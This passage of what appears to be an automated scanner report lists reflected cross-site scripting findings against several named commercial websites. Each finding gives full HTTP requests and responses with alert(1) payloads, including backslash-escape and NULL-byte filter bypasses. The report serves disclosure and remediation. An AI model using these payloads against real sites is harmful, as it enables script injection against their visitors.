Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=73E568CE4B0C14B964FA76DECEA49F5F; mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:22:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=; Domain=.mybuys.com; Expires=Wed, 18-Oct-2079 17:36:57 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 7155

var urls = new Array(12);
urls[11]="http://www.wineexpress.com/wximages/products/thumbnails/P28485.jpg";
urls[6]="/shopping/prod_detail/main.asp?productID=27981&amp;green=4F3F8B20-763A-5480-90F3-DFE58
...[SNIP]...
is.mybuysContainer) this.mybuysContainer.appendChild(mbframe);
       }
   }
}
if(mybuys.mybuysContainer) {
mybuys.appendIFrame("http://ads.p.veruta.com/adserver/track?merchantid=3120185895&category=4266d";alert(1)//5ea28e2c812&cmid=4F3F8B20-763A-5480-90F3-DFE588224975&itemid=38847926670&eventid=0&ifmode=1");
}

1.11. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The value of the ckc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8439e\'%3balert(1)//73c4e1a6e9d was submitted in the ckc parameter. This input was echoed as 8439e\\';alert(1)//73c4e1a6e9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /webrec/wr.do?client=WINEEXPRESS&sessionId=18150910-25F2-5601-A408-08011B7AFE7D&ns=1&wrz=2&pt=prod&productname=Charles%20Krug%202008%20Cabernet%20Sauvignon%2C%20Napa%20Valley&cpc=28484&categoryname=&ckc=8439e\'%3balert(1)//73c4e1a6e9d&notinstock=n&mbcc=9ED80074-FADB-567A-9FF3-03E37B6DE2C2&lang=en&v=5.0.0&mbts=1317392563417&rf=http%3A%2F%2Fwww.wineexpress.com%2F&purl=http%3A%2F%2Fwww.wineexpress.com%2Fshopping%2Fprod_detail%2Fmain.asp%3Fcat%3DWOD%26sl%3D0%26productID%3D28484%26uid%3D467272C6-13FC-4B08-9F46-83359542A5A8%26icid%3DHPWOD HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.wineexpress.com/shopping/prod_detail/main.asp?cat=WOD&sl=0&productID=28484&uid=467272C6-13FC-4B08-9F46-83359542A5A8&icid=HPWOD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=73E568CE4B0C14B964FA76DECEA49F5F; mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:22:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=; Domain=.mybuys.com; Expires=Wed, 18-Oct-2079 17:36:58 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 7164

var urls = new Array(12);
urls[5]="http://www.wineexpress.com/wximages/products/thumbnails/P28485.jpg";
urls[10]="http://t.p.mybuys.com/webrec/wrClick.do?client=WINEEXPRESS&amp;consumerId=4F3F8B20-763
...[SNIP]...
<span name="mbdbgspan" cl="WINEEXPRESS" cp="38847926670," cc="8439e\\';alert(1)//73c4e1a6e9d" pr="27981" re="6513926" po="5391769" cr="5245887" style="display:none;">
...[SNIP]...

1.12. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The value of the ckc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e99"><script>alert(1)</script>f46440a6244 was submitted in the ckc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webrec/wr.do?client=WINEENTHUSIAST&sessionId=306429C3-0379-54DB-BB6C-731E0A0320B8&ns=1&pt=hcat&categoryname=GLASSWARE&ckc=d2e99"><script>alert(1)</script>f46440a6244&mbcc=111DAB9B-A587-5575-92D4-CE44C816D484&lang=en&v=5.0.0&mbts=1317392582360&rf=http%3A%2F%2Fwww.wineenthusiast.com%2F&purl=http%3A%2F%2Fwww.wineenthusiast.com%2Fglassware.asp%3Ficid%3DHPGLASSWAREASPOT1 HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.wineenthusiast.com/glassware.asp?icid=HPGLASSWAREASPOT1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2CA9537418469A039D16877446149CA9; mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:23:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=; Domain=.mybuys.com; Expires=Wed, 18-Oct-2079 17:37:14 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 328

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://ads.p.veruta.com/adserver/track?merchantid=1061873813&category=d2e99"><script>alert(1)</script>f46440a6244&cmid=4F3F8B20-763A-5480-90F3-DFE588224975&itemid=&eventid=0&ifmode=1">
...[SNIP]...

1.13. http://vms.boldchat.com/aid/4851320892863947163/bc.vms/vms.js [cp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vms.boldchat.com
Path:   /aid/4851320892863947163/bc.vms/vms.js

Issue detail

The value of the cp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35236'-alert(1)-'f5c47e1c87f was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aid/4851320892863947163/bc.vms/vms.js?url=http%3A//www.bayoufitness.com/&referrer=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D66%26c2%3D68&cidid=7612413275609366566&cwdid=6520389440406690523&cp=http35236'-alert(1)-'f5c47e1c87f&cw=640&ch=480 HTTP/1.1
Host: vms.boldchat.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.bayoufitness.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
X-Boldcenter-PageViewID: 9223371878586569804
X-Boldcenter-VisitID: 9223371959378469890
Set-Cookie: bc-visitor-id=4851320892863947163=8643616791963063189; domain=.boldchat.com; path=/; expires=Sat, 29-Sep-2012 14:25:53 GMT
Set-Cookie: bc-visit-id=4851320892863947163=9223371959378469890; domain=.boldchat.com; path=/
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Fri, 30 Sep 2011 14:25:53 GMT
Content-Length: 6217

var bt_pollEvery=function(polls, blur, polled){ return (blur ? 2 : 1) * (polls >= 60000 ? (polls >= 600000 ? (polls >= 3600000 ? (polls >= 14400000 ? (polls >= 43200000 ? 300 : 180) : 120) : 60) : 30)
...[SNIP]...
ery='url=http%3A//www.bayoufitness.com/&referrer=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D66%26c2%3D68&cidid=7612413275609366566&cwdid=6520389440406690523&cp=http35236'-alert(1)-'f5c47e1c87f&cw=640&ch=480';
var bt_canInvite=true;
var bt_accountID='4851320892863947163';
var bt_pageScheme='http://';
var bt_pollHost='vmp.boldchat.com';
var bt_websiteDefID='';
bt_addEvent(window, 'focus', fun
...[SNIP]...

1.14. http://vms.boldchat.com/aid/4851320892863947163/bc.vms/vms.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vms.boldchat.com
Path:   /aid/4851320892863947163/bc.vms/vms.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97f69'-alert(1)-'dc1bb494145 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aid/4851320892863947163/bc.vms/vms.js?url=http%3A//www.bayoufitness.com/&referrer=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D66%26c2%3D68&cidid=7612413275609366566&cwdid=6520389440406690523&cp=http&cw=640&ch=480&97f69'-alert(1)-'dc1bb494145=1 HTTP/1.1
Host: vms.boldchat.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.bayoufitness.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
X-Boldcenter-PageViewID: 9223371878586569809
X-Boldcenter-VisitID: 9223371959378469890
Set-Cookie: bc-visitor-id=4851320892863947163=8643616791963063189; domain=.boldchat.com; path=/; expires=Sat, 29-Sep-2012 14:25:53 GMT
Set-Cookie: bc-visit-id=4851320892863947163=9223371959378469890; domain=.boldchat.com; path=/
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Fri, 30 Sep 2011 14:25:53 GMT
Content-Length: 6220

var bt_pollEvery=function(polls, blur, polled){ return (blur ? 2 : 1) * (polls >= 60000 ? (polls >= 600000 ? (polls >= 3600000 ? (polls >= 14400000 ? (polls >= 43200000 ? 300 : 180) : 120) : 60) : 30)
...[SNIP]...
A//www.bayoufitness.com/&referrer=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D66%26c2%3D68&cidid=7612413275609366566&cwdid=6520389440406690523&cp=http&cw=640&ch=480&97f69'-alert(1)-'dc1bb494145=1';
var bt_canInvite=true;
var bt_accountID='4851320892863947163';
var bt_pageScheme='http://';
var bt_pollHost='vmp.boldchat.com';
var bt_websiteDefID='';
bt_addEvent(window, 'focus', function(){

...[SNIP]...

1.15. http://vms.boldchat.com/aid/4851320892863947163/bc.vms/vms.js [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vms.boldchat.com
Path:   /aid/4851320892863947163/bc.vms/vms.js

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf6ad'-alert(1)-'3660b5b81e6 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aid/4851320892863947163/bc.vms/vms.js?url=http%3A//www.bayoufitness.com/&referrer=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D66%26c2%3D68bf6ad'-alert(1)-'3660b5b81e6&cidid=7612413275609366566&cwdid=6520389440406690523&cp=http&cw=640&ch=480 HTTP/1.1
Host: vms.boldchat.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.bayoufitness.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
X-Boldcenter-PageViewID: 9223371878586569799
X-Boldcenter-VisitID: 9223371959378469890
Set-Cookie: bc-visitor-id=4851320892863947163=8643616791963063189; domain=.boldchat.com; path=/; expires=Sat, 29-Sep-2012 14:25:52 GMT
Set-Cookie: bc-visit-id=4851320892863947163=9223371959378469890; domain=.boldchat.com; path=/
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Fri, 30 Sep 2011 14:25:52 GMT
Content-Length: 6217

var bt_pollEvery=function(polls, blur, polled){ return (blur ? 2 : 1) * (polls >= 60000 ? (polls >= 600000 ? (polls >= 3600000 ? (polls >= 14400000 ? (polls >= 43200000 ? 300 : 180) : 120) : 60) : 30)
...[SNIP]...
ID='9223371878586569799';
var bt_hadReferrer=true;
var bt_query='url=http%3A//www.bayoufitness.com/&referrer=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D66%26c2%3D68bf6ad'-alert(1)-'3660b5b81e6&cidid=7612413275609366566&cwdid=6520389440406690523&cp=http&cw=640&ch=480';
var bt_canInvite=true;
var bt_accountID='4851320892863947163';
var bt_pageScheme='http://';
var bt_pollHost='vmp.boldchat.co
...[SNIP]...

1.16. http://vms.boldchat.com/aid/4851320892863947163/bc.vms/vms.js [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vms.boldchat.com
Path:   /aid/4851320892863947163/bc.vms/vms.js

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6d37'-alert(1)-'014bfbd25fd was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aid/4851320892863947163/bc.vms/vms.js?url=http%3A//www.bayoufitness.com/b6d37'-alert(1)-'014bfbd25fd&referrer=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D66%26c2%3D68&cidid=7612413275609366566&cwdid=6520389440406690523&cp=http&cw=640&ch=480 HTTP/1.1
Host: vms.boldchat.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.bayoufitness.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
X-Boldcenter-PageViewID: 9223371878586569794
X-Boldcenter-VisitID: 9223371959378469890
Set-Cookie: bc-visitor-id=4851320892863947163=8643616791963063189; domain=.boldchat.com; path=/; expires=Sat, 29-Sep-2012 14:25:51 GMT
Set-Cookie: bc-visit-id=4851320892863947163=9223371959378469890; domain=.boldchat.com; path=/
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Fri, 30 Sep 2011 14:25:51 GMT
Content-Length: 6217

var bt_pollEvery=function(polls, blur, polled){ return (blur ? 2 : 1) * (polls >= 60000 ? (polls >= 600000 ? (polls >= 3600000 ? (polls >= 14400000 ? (polls >= 43200000 ? 300 : 180) : 120) : 60) : 30)
...[SNIP]...
}; }; };
var bt_visitorID='8643616791963063189';
var bt_visitID='9223371959378469890';
var bt_pageViewID='9223371878586569794';
var bt_hadReferrer=true;
var bt_query='url=http%3A//www.bayoufitness.com/b6d37'-alert(1)-'014bfbd25fd&referrer=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D66%26c2%3D68&cidid=7612413275609366566&cwdid=6520389440406690523&cp=http&cw=640&ch=480';
var bt_canInvite=true;
...[SNIP]...

1.17. http://www.bountyhunterwine.com/message.asp [msg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bountyhunterwine.com
Path:   /message.asp

Issue detail

The value of the msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0017b72"><script>alert(1)</script>15f1f7c3bbd was submitted in the msg parameter. This input was echoed as 17b72"><script>alert(1)</script>15f1f7c3bbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /message.asp?msg=SQLI%0017b72"><script>alert(1)</script>15f1f7c3bbd HTTP/1.1
Host: www.bountyhunterwine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.bountyhunterwine.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cartcooky=; e2state=%7B9F002444%2DC7FE%2D42A4%2DB566%2D75F1663812FEVEREST8%7D; ASPSESSIONIDCQADTCBC=AHMNKENCGCIGBCPBAOLNCDOH; __utma=245155094.859403932.1317390637.1317390637.1317390637.1; __utmb=245155094.1.10.1317390637; __utmc=245155094; __utmz=245155094.1317390637.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 13:43:50 GMT
Content-Length: 40599
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: cartcooky=; expires=Fri, 30-Dec-2011 14:43:50 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bounty Hunter R
...[SNIP]...
<input type="hidden" name="return_url" value="http://www.bountyhunterwine.com/message.asp?msg=SQLI%0017b72"><script>alert(1)</script>15f1f7c3bbd">
...[SNIP]...

1.18. http://www.bountyhunterwine.com/message.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bountyhunterwine.com
Path:   /message.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e9a49"><script>alert(1)</script>d48d813cc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9a49"><script>alert(1)</script>d48d813cc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /message.asp?msg=SQLI&%00e9a49"><script>alert(1)</script>d48d813cc34=1 HTTP/1.1
Host: www.bountyhunterwine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.bountyhunterwine.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cartcooky=; e2state=%7B9F002444%2DC7FE%2D42A4%2DB566%2D75F1663812FEVEREST8%7D; ASPSESSIONIDCQADTCBC=AHMNKENCGCIGBCPBAOLNCDOH; __utma=245155094.859403932.1317390637.1317390637.1317390637.1; __utmb=245155094.1.10.1317390637; __utmc=245155094; __utmz=245155094.1317390637.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 13:43:56 GMT
Content-Length: 40602
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: cartcooky=; expires=Fri, 30-Dec-2011 14:43:56 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bounty Hunter R
...[SNIP]...
<input type="hidden" name="return_url" value="http://www.bountyhunterwine.com/message.asp?msg=SQLI&%00e9a49"><script>alert(1)</script>d48d813cc34=1">
...[SNIP]...

1.19. http://www.bountyhunterwine.com/viewcart.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bountyhunterwine.com
Path:   /viewcart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003cb6f"><script>alert(1)</script>ff8324c4d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3cb6f"><script>alert(1)</script>ff8324c4d92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /viewcart.asp?%003cb6f"><script>alert(1)</script>ff8324c4d92=1 HTTP/1.1
Host: www.bountyhunterwine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bountyhunterwine.com/storeitems.asp?cc=SPIRITS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e2state=%7B9F002444%2DC7FE%2D42A4%2DB566%2D75F1663812FEVEREST8%7D; ASPSESSIONIDCQADTCBC=AHMNKENCGCIGBCPBAOLNCDOH; lvCats=cc%3DSPIRITS%7ESpirits+%28Available+to+California+residents+only%29; __utma=245155094.859403932.1317390637.1317390637.1317390637.1; __utmb=245155094.2.10.1317390637; __utmc=245155094; __utmz=245155094.1317390637.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; recentadd=; cartcooky=1SAENNVWH3%7E2%7E1%7EMe

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 14:11:18 GMT
Content-Length: 192445
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: cartcooky=1SAENNVWH3%7E22%7E1%7EMe%7E1SAENNVWH3%7E2%7E1%7EMecaafd1b19125500d2f49f2bc%7E1SAENNVWH3%7E2%7E1%7Ecaafd1b113a1581b7a446e1e; expires=Fri, 30-Dec-2011 15:11:16 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bounty Hunter Rar
...[SNIP]...
<input type="hidden" name="refUrl" value="/viewcart.asp?%003cb6f"><script>alert(1)</script>ff8324c4d92=1" />
...[SNIP]...

1.20. http://www.charlottes-saddlery.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.charlottes-saddlery.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bcfc8<script>alert(1)</script>483939ae55c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bcfc8<script>alert(1)</script>483939ae55c=1 HTTP/1.1
Host: www.charlottes-saddlery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=66&c2=68
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 14:25:36 GMT
Server: Apache
Set-Cookie: mm5-COS-basket-id=75c2ad7cf358b45e59a1368c5e7d0a21; expires=Sat, 29-Sep-2012 14:25:36 GMT; path=/; HttpOnly
Content-Length: 17298
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Connection: close
Content-Type: text/html

